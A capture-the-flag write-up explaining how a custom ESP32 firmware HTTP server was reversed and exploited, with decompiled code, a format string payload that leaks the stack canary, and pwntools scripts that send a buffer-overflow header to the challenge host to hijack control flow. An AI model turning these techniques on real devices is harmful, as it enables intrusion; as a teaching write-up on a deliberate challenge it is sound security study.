Every Italian Politician V1

This was a really fun pwn challenge from the 2023 edition of Hackappatoi CTF. It involved reversing a custom ESP32 firmware and leveraging both a format string vulnerability and a buffer overflow. The handout contains both the .elf and the raw .bin firmware image. The ESP32 family of microcontrollers usually employs a Tensilica Xtensa microprocessor; this was also the case in this challenge, as we can easily see from the two scripts run_dbg.sh and run_prod.sh:

# run_dbg.sh

#!/bin/bash
setsid qemu-system-xtensa -cpu esp32 -M esp32 -m 4M -drive file=flash.bin,if=mtd,format=raw -nic user,model=open_eth,hostfwd=tcp::80-:80 -s &
qemu_pid=$!
sleep 5
/root/.espressif/tools/xtensa-esp-elf-gdb/12.1_20221002/xtensa-esp-elf-gdb/bin/xtensa-esp32-elf-gdb /root/every-italian-politician.elf -ex "target remote:1234"
kill -9 $qemu_pid


# run_prod.sh

#!/bin/bash
while true
do
    qemu-system-xtensa -cpu esp32 -M esp32 -m 4M -drive file=flash.bin,if=mtd,format=raw -nic user,model=open_eth,hostfwd=tcp::80-:80 &
    qemu_pid=$!
    sleep 20
    kill -9 $qemu_pid
done

These are used for debugging and testing, by emulating the target architecture using qemu.

The first step is understanding how to reverse the firmware. Few tools support Xtensa out of the box, but luckily there exists a processor module for Ghidra (located here. This is actually a fork of the original repo that implements support for Ghidra 10.x). With this out of the way, it’s time to actually look at the code. The binary seems to implement a simple HTTP server using the Espressif IoT Development Framework. With some digging around, one can notice an interesting get_handler function:

undefined4 get_handler(undefined4 param_1)

{
  uint uVar1;
  int iVar2;
  char *pcVar3;
  uint auStack_24 [9];
  
  req_glob = param_1;
  iVar2 = httpd_req_get_hdr_value_len(param_1,s_parrot_3f404454);
  uVar1 = iVar2 + 1;
  buf_len = uVar1;
  if (uVar1 < 2) {
    iVar2 = httpd_req_get_hdr_value_len(param_1,s_super-secret_3f40445c);
    uVar1 = iVar2 + 1;
    buf_len = uVar1;
    if (uVar1 < 2) {
      httpd_resp_send(param_1,s_Welcome_to_the_Italian_Parliamen_3f404470,0xffffffff);
    }
    else {
      buf = (char *)valloc(uVar1);
      iVar2 = httpd_req_get_hdr_value_str(param_1,s_super-secret_3f40445c,buf,uVar1);
      if (iVar2 == 0) {
        sscanf(buf,&DAT_3f40446c,auStack_24,uVar1);
        if (auStack_24[0] < 0x4e) {
          secret(auStack_24[0],&DAT_3f40446c,auStack_24,uVar1);
        }
        else {
          secret(1,&DAT_3f40446c,auStack_24,uVar1);
        }
        httpd_resp_send(req_glob,parrot1,0xffffffff,uVar1);
      }
      free(buf);
    }
  }
  else {
    pcVar3 = (char *)valloc(uVar1);
    buf = pcVar3;
    iVar2 = httpd_req_get_hdr_value_str(param_1,s_parrot_3f404454,pcVar3,uVar1);
    if (iVar2 == 0) {
      parrot(0,s_parrot_3f404454,pcVar3,uVar1);
      httpd_resp_send(req_glob,parrot1,0xffffffff,uVar1);
    }
    free(buf);
  }
  return 0;
}
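
Stripped of the decompiler noise, the branch selection in the handler can be modelled in a few lines of Python. This is only a sketch of my reading of the decompilation: the function names are mine, the header lookup is simplified to a dictionary, and I assume the number parsed by sscanf is compared as an unsigned value (which is what the uint type suggests).

```python
SECRET_LIMIT = 0x4e  # bound checked before secret() is called


def pick_branch(headers: dict) -> str:
    """Mirror the nested length checks: parrot takes priority over super-secret."""
    if len(headers.get("parrot", "")) > 0:
        return "parrot"
    if len(headers.get("super-secret", "")) > 0:
        return "secret"
    return "welcome"


def secret_argument(parsed: int) -> int:
    """Value handed to secret(): the parsed number if below the limit, else 1."""
    value = parsed & 0xffffffff  # assumption: the comparison is unsigned
    return value if value < SECRET_LIMIT else 1


print(pick_branch({"parrot": "hello"}))
print(pick_branch({"super-secret": "0"}))
print(secret_argument(0), secret_argument(200))
```

Note that a request carrying both headers never reaches the super-secret branch in this model, which is why the leak and the overflow need two separate requests.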

The code is pretty straightforward: it first checks whether the parrot header is present with a non-empty value. If it is, it copies the value into a buffer, passes it to the parrot function (more on it later), and returns an HTTP response with the content of parrot1 in it. If the header is not set, the program performs another series of checks. It makes the same length check, but this time on the super-secret header. If its value is non-empty, it extracts the first numerical value in it with sscanf. If it’s less than 0x4e, it passes it as the first argument to the secret function (more on this later too); otherwise it calls secret with 1 as the first parameter. It then sends an HTTP response as before. Okay, this was the easy part. Now let’s dive into the specifics of what parrot and secret actually do. It seemed logical to start from secret given its name:

int secret(int param_1)

{
  if (param_1 == 0) {
    vuln();
  }
  else {
    secret(param_1 + -1);
  }
  return param_1;
}

From this, it already seems clear that we can construct our initial payload so that param_1 == 0 is true. The actual vuln code is:

int vuln(void)
{
  int iVar1;
  undefined4 uVar2;
  int local_6c;
  undefined4 local_64;
  undefined auStack_60 [60];
  int local_24;
  
  iVar1 = buf;
  memw();
  memw();
  local_24 = __stack_chk_guard;
  local_6c = 0;
  local_64 = 0;
  uVar2 = memset(auStack_60,0,0x3c);
  for (; *(char *)(iVar1 + local_6c) != '\0'; local_6c = local_6c + 1) {
    auStack_60[local_6c + -4] = *(undefined *)(iVar1 + local_6c);
  }
  memw();
  memw();
  if (local_24 != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail(uVar2,0,0x3c);
  }
  return __stack_chk_guard;
}
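
The amount of filler needed before the canary can be read off the variable names. This is a sketch under one assumption: that Ghidra named the locals after their stack offsets, so local_64 (the first byte the copy loop writes, i.e. auStack_60[-4]) and local_24 (the saved canary) are 0x64 and 0x24 bytes away from the same reference point.

```python
FIRST_WRITE = 0x64  # local_64: where auStack_60[local_6c - 4] starts writing
CANARY_SLOT = 0x24  # local_24: copy of __stack_chk_guard


def padding_to_canary(first_write: int = FIRST_WRITE, canary: int = CANARY_SLOT) -> int:
    """Number of bytes copied before the next one lands on the canary."""
    return first_write - canary


print(padding_to_canary())
```

The result agrees with the declared sizes: 4 bytes of local_64 plus the 60 bytes of auStack_60.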

Well, this seems like a classical buffer overflow. Here we don’t have any constraints on the length of the payload since it keeps reading until it gets a null byte. That canary check is annoying though. Luckily for us, __stack_chk_guard is global, meaning that it will be the same also for other functions. Let’s look at the parrot function:

int parrot(void)
{
  undefined4 uVar1;
  undefined1 *puVar2;
  int iVar3;
  undefined4 uStack_34;
  undefined4 uStack_30;
  undefined4 uStack_2c;
  undefined4 uStack_28;
  int iStack_24;
  
  memw();
  memw();
  iStack_24 = __stack_chk_guard;
  uStack_34 = 0;
  uStack_30 = 0;
  uStack_2c = 0;
  uStack_28 = 0;
  puVar2 = parrot1;
  memcpy(parrot1,s_I'm_an_italian_politician!_I_rep_3f404400,0x52);
  uVar1 = buf;
  strncpy(&uStack_34,buf,5);
  iVar3 = strlen(puVar2,uVar1,5);
  iVar3 = sprintf(puVar2 + iVar3,(char *)&uStack_34,5);
  memw();
  memw();
  if (iStack_24 != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail(iVar3,&uStack_34,5);
  }
  return __stack_chk_guard;
}
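
To get a feeling for what ends up as the sprintf format, here is a small Python model of the strncpy step. It is a sketch, not the firmware logic: the helper names are mine, and I rely on the four zeroed locals after uStack_34 acting as the string terminator.

```python
def effective_format(header_value: bytes, limit: int = 5) -> bytes:
    """Bytes of the header that survive strncpy and are used as the format."""
    copied = header_value[:limit]        # strncpy(&uStack_34, buf, 5)
    return copied.split(b"\x00", 1)[0]   # zeroed locals terminate the string


def positional(index: int, conv: str = "d") -> bytes:
    """Build a positional specifier such as %12$d."""
    return f"%{index}${conv}".encode()


print(effective_format(b"%p" * 12))
print(effective_format(positional(12)))
```

A chain of %p gets cut after two and a half specifiers, while a two-digit positional specifier fits in the five bytes exactly.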

This just copies the user input back into the buffer that will be returned with the HTTP response, alongside some other text. Taking a closer look at sprintf(puVar2 + iVar3,(char *)&uStack_34,5), we can notice that we control uStack_34, which is used as the format string. Thanks to this, we can perform a format string attack and leak the canary (more on this here). There is a problem though: the canary is kinda high in the stack, hence we would need a long format string in the form of %p%p%p... to leak it, but the call to strncpy(&uStack_34,buf,5) gives us only 5 bytes. Thankfully, this is not really a problem, since we can select which argument to print with the positional syntax %n$. Thus, after some trial and error, we are able to leak the canary with the following script:

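from pwn import *

while True:
    r = None
    try:
        r = remote("localhost", 8080)
        # Only 5 bytes of the header reach sprintf: "%12$d" fits exactly
        r.send(b"GET / HTTP/1.1\r\nparrot: %12$d\r\n\r\n")
        r.recvuntil(b"something!\n")
        # %d prints a signed value, so mask it back to an unsigned 32-bit canary
        canary = int(r.recv(timeout=1).decode().strip()) & 0xffffffff
        log.info(f"canary: {canary:#x}")
        break
    except Exception:
        continue  # the leak failed (e.g. the target was restarting): retry
    finally:
        if r is not None:
            r.close()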
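
The masking step deserves a word: %d prints the canary as a signed decimal, so a value with the top bit set comes back negative. Below is a minimal sketch of the parsing on its own, without a network connection. The response body and the canary value in the example are made up; only the "something!\n" marker comes from the script.

```python
def parse_canary(body: bytes, marker: bytes = b"something!\n") -> int:
    """Extract the leaked value printed after the marker as an unsigned 32-bit int."""
    _, _, tail = body.partition(marker)
    return int(tail.decode().strip()) & 0xffffffff


# Hypothetical response body, for illustration only
example = b"... something!\n-559038737"
print(hex(parse_canary(example)))
```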

Ok, we’ve got the canary. It’s time to go back to secret. Before crafting the remaining part of the exploit, we need to decide where to actually jump to in the code. The win function seems like a good candidate:

undefined * win(undefined *param_1)

{
  undefined *puVar1;
  
  puVar1 = flag;
  if (param_1 != flag) {
    httpd_resp_send();
  }
  return puVar1;
}

At first glance, it should be enough to jump to its entry point, 0x400d71d0. This gives us another problem to solve: when packed as a p32, this address results in \xd0q\r@. The carriage return can’t be present in our payload, since it will break the whole HTTP request. I’m pretty sure the author noticed this, since the win function contains a huge nop sled that ends when the corresponding address doesn’t contain \r anymore when packed. Nice, now it’s time to wrap it up. Before going into the next section there is some reading to do, or else it won’t make any sense. This and this helped me tremendously in understanding what was going on. The takeaway points are two:

we have to deal with windowed registers
stack layout is kinda weird

I won’t go into detail about these, since the resources I linked already do a great job at explaining them. The thing that interests us is: the return address is not stored on the stack, but in the register a0. At first this seems like a real problem: if the return address is not on the stack, then we can’t overwrite it. Well, that’s only half the truth. In fact, if a window overflow exception occurs (really, read those posts), registers get saved onto the stack, and then restored at the proper time. This is exactly the scenario we are in, and thus we are able to overwrite not the current function’s return address, but the one of a caller further up the call chain: the control flow will be hijacked at restoration time. Leveraging this last thing, our exploit is the following (note that the ret address is not 0x400e2d2e but 0x800e2d2e, since the two topmost bits indicate by how much the register window must be rotated):

from pwn import *

while True:
    try:
        r = remote("92.246.89.201", 10004)
        r.send(b"GET / HTTP/1.1\r\nparrot: %12$d\r\n\r\n")
        r.recvuntil(b"something!\n")
        canary = int(r.recv(timeout=1).decode().strip())
        canary = canary & 0xffffffff
        ret_addr = 0x800e2d2e
        r.send(b"GET / HTTP/1.1\r\nsuper-secret: 0" + b"a" * 63 + p32(canary) + b"a"*48 + p32(ret_addr) + b"\r\n\r\n")
        r.interactive()
        break
    except Exception as e:
        r.close()
        continue
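
The header value sent in the second request can also be built and sanity-checked offline. The sketch below uses struct instead of pwntools so it runs anywhere. The helper names, the set of "bad" bytes, and the canary values in the examples are my own assumptions; the layout (64 bytes of filler starting with "0", the canary, 48 more bytes, the return address) is the one from the exploit. The call_n = 2 default reflects my understanding that the two top bits of a0 hold the window increment (2 meaning a rotation by 8 registers), which is what turns 0x400e2d2e into 0x800e2d2e.

```python
import struct

# NUL stops the copy loop in vuln; CR and LF would end the HTTP header line
BAD_BYTES = b"\x00\r\n"


def p32(value: int) -> bytes:
    """Little-endian 32-bit pack, same result as pwntools' p32 default."""
    return struct.pack("<I", value)


def has_bad_bytes(data: bytes) -> bool:
    return any(b in BAD_BYTES for b in data)


def encode_ret(addr: int, call_n: int = 2) -> int:
    """Store the window increment in bits 31..30 of the return address."""
    return (addr & 0x3fffffff) | (call_n << 30)


def build_header_value(canary: int, ret_addr: int) -> bytes:
    value = b"0" + b"a" * 63 + p32(canary) + b"a" * 48 + p32(ret_addr)
    if has_bad_bytes(value):
        raise ValueError("payload contains a byte that would truncate the request")
    return value


print(has_bad_bytes(p32(0x400d71d0)))  # win's entry point packs to \xd0q\r@
print(hex(encode_ret(0x400e2d2e)))
```

The check also explains why the exploit runs in a loop: a canary that happens to contain one of these bytes cannot be sent back intact, so that attempt has to be retried.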

and here’s our flag: hctf{c0rrupt10n_c0rrupt10n_3v3rywh3r3}

untrue.me


Untrue